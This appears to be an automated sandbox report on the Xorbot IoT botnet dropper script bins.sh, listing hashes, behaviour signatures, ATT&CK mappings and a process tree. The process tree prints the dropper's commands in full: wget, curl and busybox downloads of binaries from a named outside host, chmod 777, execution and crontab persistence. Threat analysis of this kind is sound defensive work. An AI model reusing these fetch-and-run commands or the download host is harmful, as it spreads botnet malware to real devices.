xorbot | 199cd72604764bd453856e029830cce18d0f746a1caae617cbafebda9d785617

Analysis

max time kernel
149s
max time network
161s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
28/02/2025, 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

4cfb0882602e49bb3bb56c54e08029a6
SHA1

d60467677204a5e3045c01dca1ff688264ab69b9
SHA256

199cd72604764bd453856e029830cce18d0f746a1caae617cbafebda9d785617
SHA512

d9a9c852ca4823533dab2b557a096e4055d3665ce8f562b2d0612029ecba77d391811af06e53e55e4fb483589d1009ab948faf0590252578a3f9a143d5c14aef
SSDEEP

192:0BBSrBsKwWxWlWYW/W3WB9GurAMMsG253Xy5bz2R95PvExdDPvExdrV3X0bz2R9L:0BBSrBsKwWxWlWYW/W3WB6sG285bz2RF

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-3.dat	family_xorbot
behavioral2/files/fstream-5.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1735) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
733	chmod
771	chmod
781	chmod
680	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb	681	bins.sh
/tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL	734	bins.sh
/tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy	772	bins.sh
/tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB	782	bins.sh

Renames itself 1 IoCs

pid	Process
783	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.F48unm	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/968/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/17/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/646/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/796/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/806/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/929/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/21/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/817/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/847/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/961/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/9/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/830/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/836/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/937/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/789/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/827/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/274/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/794/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/957/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/303/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/841/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/859/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/870/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/105/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/5/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/938/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/822/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/964/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/828/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/868/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/896/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/911/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/8/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/832/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/838/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/933/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/943/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/43/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/780/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/795/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/799/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/854/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/949/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/4/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/591/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/853/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/15/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/863/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/837/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/892/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/108/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/24/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/28/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/930/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/936/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/6/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/940/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/7/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/944/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
File opened for reading	/proc/791/cmdline	6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB

System Network Configuration Discovery 1 TTPs 13 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
792	wget
650	wget
669	curl
679	busybox
710	busybox
737	wget
775	wget
684	wget
700	curl
742	curl
752	busybox
776	curl
778	busybox

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB	curl
File opened for modification	/tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb	wget
File opened for modification	/tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb	busybox
File opened for modification	/tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL	curl
File opened for modification	/tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy	wget
File opened for modification	/tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy	curl
File opened for modification	/tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB	wget
File opened for modification	/tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb	curl
File opened for modification	/tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:646
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:648
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:650
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:669
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:679
- /bin/chmod
  chmod 777 rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
  2⤵
  - File and Directory Permissions Modification
  PID:680
- /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
  ./rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
  2⤵
  PID:681
- /bin/rm
  rm rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
  2⤵
  PID:683
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:684
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:700
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
  2⤵
  - System Network Configuration Discovery
  PID:710
- /bin/chmod
  chmod 777 bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
  ./bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
  2⤵
  PID:734
- /bin/rm
  rm bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
  2⤵
  PID:736
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:737
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:742
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
  2⤵
  - System Network Configuration Discovery
  PID:752
- /bin/chmod
  chmod 777 zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
  ./zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
  2⤵
  PID:772
- /bin/rm
  rm zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy
  2⤵
  PID:774
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:775
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:776
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
  2⤵
  - System Network Configuration Discovery
  PID:778
- /bin/chmod
  chmod 777 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
  ./6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:782
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:784
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:785
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:786
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:787
- /bin/rm
  rm 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB
  2⤵
  PID:789
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gyAnr1XdiI2ATNkxA7xyQOEEXCMZ1sTD2H
  2⤵
  - System Network Configuration Discovery
  PID:792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL

Filesize
98KB

MD5
5141342d0df8699fa32a6b066a0c592e

SHA1
8157673225bd5182f16215e2aa823a25ca2d4fbc

SHA256
54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

SHA512
d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

Download Submit
/tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy

Filesize
111KB

MD5
ca897a38f23ec23521ce0b1b83f8422d

SHA1
b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

SHA256
043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

SHA512
10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

Download Submit
/var/spool/cron/crontabs/tmp.F48unm

Filesize
210B

MD5
56826eaf19922aacd4557f4f049e6966

SHA1
f0ba92e23adf3e24d5292c738b785b7172061bac

SHA256
aa8c87722287adc2a56b499ae4ae7389a867eabe4184b9f5283e3d7aeca48e97

SHA512
f46e9d125921136d8bb454dc33c215052ec4ba3ca903f36ee8669b6908e8242c3a56495469f3836fa07eac2cc2c9cc337c55f5e1e734ebbb055acee0c6bb9797

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads